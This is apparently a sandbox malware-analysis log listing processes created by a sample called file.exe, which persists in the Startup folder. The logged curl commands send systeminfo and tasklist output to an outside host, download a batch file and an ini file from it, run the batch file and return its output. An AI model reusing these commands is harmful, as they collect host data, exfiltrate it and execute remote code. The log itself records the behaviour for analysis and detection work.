Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |